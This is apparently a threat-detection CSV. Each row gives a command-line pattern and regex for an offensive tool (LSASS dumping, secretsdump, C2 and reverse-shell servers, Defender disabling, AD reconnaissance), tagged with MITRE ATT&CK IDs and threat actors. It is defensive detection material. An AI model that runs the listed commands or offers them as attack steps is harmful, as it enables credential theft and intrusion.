"* --search ""(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))*",".{0,1000}\s\-\-search\s\""\(\&\(objectCategory\=computer\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=524288\)\).{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","N/A","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","3018"
"* --search ""(&(objectCategory=group)(cn=*Admins*",".{0,1000}\s\-\-search\s\""\(\&\(objectCategory\=group\)\(cn\=.{0,1000}Admins.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","N/A","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","3019"
"* --search ""(&(objectCategory=group)(cn=MS SQL Admins)*",".{0,1000}\s\-\-search\s\""\(\&\(objectCategory\=group\)\(cn\=MS\sSQL\sAdmins\).{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","N/A","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","3020"
"* --search ""(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))*",".{0,1000}\s\-\-search\s\""\(\&\(objectCategory\=user\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=4194304\)\).{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","Users With Kerberos Pre-authentication Disabled - key condition for AS-REP roasting attack.","10","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","3021"
"* --search password --from_date * --to_date *",".{0,1000}\s\-\-search\spassword\s\-\-from_date\s.{0,1000}\s\-\-to_date\s.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","3022"
"* SearchShares.ps1*",".{0,1000}\sSearchShares\.ps1.{0,1000}","offensive_tool_keyword","SearchOpenFileShares","Searches open files shares for password files or database backups - Extend as you see fit","T1083 - T1135 - T1005 - T1025","TA0007 - TA0009","N/A","Dispossessor","Discovery","https://github.com/fashionproof/SearchOpenFileShares","1","0","N/A","N/A","7","1","29","6","2019-12-13T12:37:42Z","2019-09-21T13:50:26Z","3023"
"* -seatbelt -Command *",".{0,1000}\s\-seatbelt\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3024"
"* Seatbelt.Commands.Windows*",".{0,1000}\sSeatbelt\.Commands\.Windows.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","3025"
"* SeatBelt.exe*",".{0,1000}\sSeatBelt\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","3026"
"* seatbelt_json.py*",".{0,1000}\sseatbelt_json\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","3027"
"* --seclogon-duplicate*",".{0,1000}\s\-\-seclogon\-duplicate.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","3028"
"* secrets found for DPAPI_SYSTEM*",".{0,1000}\ssecrets\sfound\sfor\sDPAPI_SYSTEM.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","3029"
"* --secrets-dump -target *",".{0,1000}\s\-\-secrets\-dump\s\-target\s.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","3030"
"* secretsdump.py*",".{0,1000}\ssecretsdump\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","3031"
"* secretsdump.py*",".{0,1000}\ssecretsdump\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","3032"
"* secretsmanagerenum.py*",".{0,1000}\ssecretsmanagerenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","3033"
"* SecretStealer.ps1*",".{0,1000}\sSecretStealer\.ps1.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","3034"
"* self_deletion.exe*",".{0,1000}\sself_deletion\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","3036"
"* SendScreenshotToTelegram*",".{0,1000}\sSendScreenshotToTelegram.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","3037"
"* SeriousSam.Execute *",".{0,1000}\sSeriousSam\.Execute\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","0","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","3038"
"* --server * --cert-path *.pfx --elevate --target * --restore *",".{0,1000}\s\-\-server\s.{0,1000}\s\-\-cert\-path\s.{0,1000}\.pfx\s\-\-elevate\s\-\-target\s.{0,1000}\s\-\-restore\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","3039"
"* --server * --cert-path *.pfx --elevate --target * --sid *",".{0,1000}\s\-\-server\s.{0,1000}\s\-\-cert\-path\s.{0,1000}\.pfx\s\-\-elevate\s\-\-target\s.{0,1000}\s\-\-sid\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","3040"
"* --server * --type pass-pols*",".{0,1000}\s\-\-server\s.{0,1000}\s\-\-type\spass\-pols.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","#linux #windows","N/A","5","3","215","36","2024-12-10T17:00:02Z","2019-12-08T00:25:57Z","3041"
"* server -p 80 --reverse --socks5*",".{0,1000}\sserver\s\-p\s80\s\-\-reverse\s\-\-socks5.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.","T1071 - T1090 - T1102","N/A","N/A","Black Basta","C2","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3042"
"* server --restrict-http-upgrade-path-prefix *wss*",".{0,1000}\sserver\s\-\-restrict\-http\-upgrade\-path\-prefix\s.{0,1000}wss.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","3043"
"* server wss://[::]:*",".{0,1000}\sserver\swss\:\/\/\[\:\:\]\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","3044"
"* server.py -s tornado --cert /*pem --key /*.pem*",".{0,1000}\sserver\.py\s\-s\stornado\s\-\-cert\s\/.{0,1000}pem\s\-\-key\s\/.{0,1000}\.pem.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","3045"
"* -ServerUri * -FindAmsiSignatures*",".{0,1000}\s\-ServerUri\s.{0,1000}\s\-FindAmsiSignatures.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","3046"
"* service -dump all-services.json*",".{0,1000}\sservice\s\-dump\sall\-services\.json.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","3047"
"* --service fortynorth*",".{0,1000}\s\-\-service\sfortynorth.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","3048"
"* -ServiceName * -PipeName *",".{0,1000}\s\-ServiceName\s.{0,1000}\s\-PipeName\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Get-System.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3051"
"* -ServiceName VulnSVC *",".{0,1000}\s\-ServiceName\sVulnSVC\s.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","3052"
"* servicetags.nse*",".{0,1000}\sservicetags\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3053"
"* --session=allrules --wordlist*",".{0,1000}\s\-\-session\=allrules\s\-\-wordlist.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","3054"
"* --SessionEnum --Host *",".{0,1000}\s\-\-SessionEnum\s\-\-Host\s.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","3055"
"* SessionGopher.ps1*",".{0,1000}\sSessionGopher\.ps1.{0,1000}","offensive_tool_keyword","SessionGopher","uses WMI to extract saved session information for remote access tools such as WinSCP - PuTTY - SuperPuTTY - FileZilla and Microsoft Remote Desktop. It can be run remotely or locally.","T1047 - T1003.008 - T1552.004 - T1555.003","TA0006","N/A","PYSA - DarkSide - Sphinx","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","0","N/A","N/A","10","10","1255","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z","3056"
"* --set-as-owned smart -bp * kerberos * --kdc-ip *",".{0,1000}\s\-\-set\-as\-owned\ssmart\s\-bp\s.{0,1000}\skerberos\s.{0,1000}\s\-\-kdc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3058"
"* Set-MasterBootRecord*",".{0,1000}\sSet\-MasterBootRecord.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3059"
"* Set-MpPreference -DisableIOAVProtection *",".{0,1000}\sSet\-MpPreference\s\-DisableIOAVProtection\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","3060"
"* SetMzLogonPwd *",".{0,1000}\sSetMzLogonPwd\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","3061"
"* set-objectowner * -target-sid * -owner-sid *",".{0,1000}\sset\-objectowner\s.{0,1000}\s\-target\-sid\s.{0,1000}\s\-owner\-sid\s.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","3062"
"* setoolkit*",".{0,1000}\ssetoolkit.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","N/A","10","11798","2922","2024-10-21T15:46:18Z","2012-12-31T22:01:33Z","3063"
"* -sgn -syscalls *",".{0,1000}\s\-sgn\s\-syscalls\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","3065"
"* -sgn -unhook -antidebug *",".{0,1000}\s\-sgn\s\-unhook\s\-antidebug\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","3066"
